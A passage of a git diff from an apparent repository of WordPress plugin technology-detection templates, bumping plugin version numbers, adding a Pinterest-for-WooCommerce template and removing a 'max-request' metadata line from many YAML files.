.../wordpress/plugins/updraftplus.yaml | 1 - .../wordpress/plugins/use-any-font.yaml | 1 - .../wordpress/plugins/user-role-editor.yaml | 1 - .../plugins/velvet-blues-update-urls.yaml | 1 - .../wordpress/plugins/w3-total-cache.yaml | 1 - .../plugins/webp-converter-for-media.yaml | 1 - .../wordpress/plugins/webp-express.yaml | 1 - .../plugins/widget-importer-exporter.yaml | 1 - .../woo-cart-abandonment-recovery.yaml | 1 - .../woo-checkout-field-editor-pro.yaml | 1 - .../plugins/woo-variation-swatches.yaml | 1 - ...merce-gateway-paypal-express-checkout.yaml | 1 - .../plugins/woocommerce-gateway-stripe.yaml | 1 - .../plugins/woocommerce-payments.yaml | 1 - .../plugins/woocommerce-paypal-payments.yaml | 1 - ...oocommerce-pdf-invoices-packing-slips.yaml | 1 - .../plugins/woocommerce-services.yaml | 1 - .../wordpress/plugins/woocommerce.yaml | 1 - .../wordpress/plugins/wordfence.yaml | 1 - .../wordpress/plugins/wordpress-importer.yaml | 1 - .../wordpress/plugins/wordpress-seo.yaml | 1 - .../wordpress/plugins/worker.yaml | 1 - .../wordpress/plugins/wp-fastest-cache.yaml | 1 - .../wordpress/plugins/wp-file-manager.yaml | 1 - .../wordpress/plugins/wp-google-maps.yaml | 1 - .../wordpress/plugins/wp-mail-smtp.yaml | 1 - .../plugins/wp-maintenance-mode.yaml | 1 - .../wordpress/plugins/wp-migrate-db.yaml | 1 - .../wordpress/plugins/wp-multibyte-patch.yaml | 1 - .../wordpress/plugins/wp-optimize.yaml | 1 - .../wordpress/plugins/wp-pagenavi.yaml | 1 - .../wordpress/plugins/wp-reset.yaml | 1 - .../plugins/wp-reviews-plugin-for-google.yaml | 1 - .../wordpress/plugins/wp-rollback.yaml | 1 - .../wordpress/plugins/wp-sitemap-page.yaml | 1 - .../wordpress/plugins/wp-smushit.yaml | 1 - .../wordpress/plugins/wp-statistics.yaml | 1 - .../wordpress/plugins/wp-super-cache.yaml | 1 - .../wordpress/plugins/wp-user-avatar.yaml | 1 - .../wordpress/plugins/wpcf7-recaptcha.yaml | 1 - .../wordpress/plugins/wpcf7-redirect.yaml | 1 - .../wordpress/plugins/wpforms-lite.yaml | 1 - .../wordpress/plugins/wps-hide-login.yaml | 1 - .../plugins/wpvivid-backuprestore.yaml | 1 - .../plugins/yith-woocommerce-wishlist.yaml | 1 - 207 files changed, 56 insertions(+), 205 deletions(-) create mode 100644 helpers/wordpress/plugins/pinterest-for-woocommerce.txt create mode 100644 http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index de2819ed97..01fc15a713 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -3.29.3 \ No newline at end of file +3.29.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index 641c2ba3f7..a244f263f3 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.25.24 \ No newline at end of file +2.25.25 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt new file mode 100644 index 0000000000..06c7347f09 --- /dev/null +++ b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt @@ -0,0 +1 @@ +1.3.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt index 1e20ec35c6..04edabda28 100644 --- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt +++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt @@ -1 +1 @@ -5.4.0 \ No newline at end of file +5.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt index 914ec96711..b8d12d7371 100644 --- a/helpers/wordpress/plugins/translatepress-multilingual.txt +++ b/helpers/wordpress/plugins/translatepress-multilingual.txt @@ -1 +1 @@ -2.6.0 \ No newline at end of file +2.6.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/updraftplus.txt b/helpers/wordpress/plugins/updraftplus.txt index e8c904de77..3339f04678 100644 --- a/helpers/wordpress/plugins/updraftplus.txt +++ b/helpers/wordpress/plugins/updraftplus.txt @@ -1 +1 @@ -1.23.9 \ No newline at end of file +1.23.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt index 77a069e39b..1ac53bb4bd 100644 --- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -1 +1 @@ -3.6.2 \ No newline at end of file +3.6.3 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: 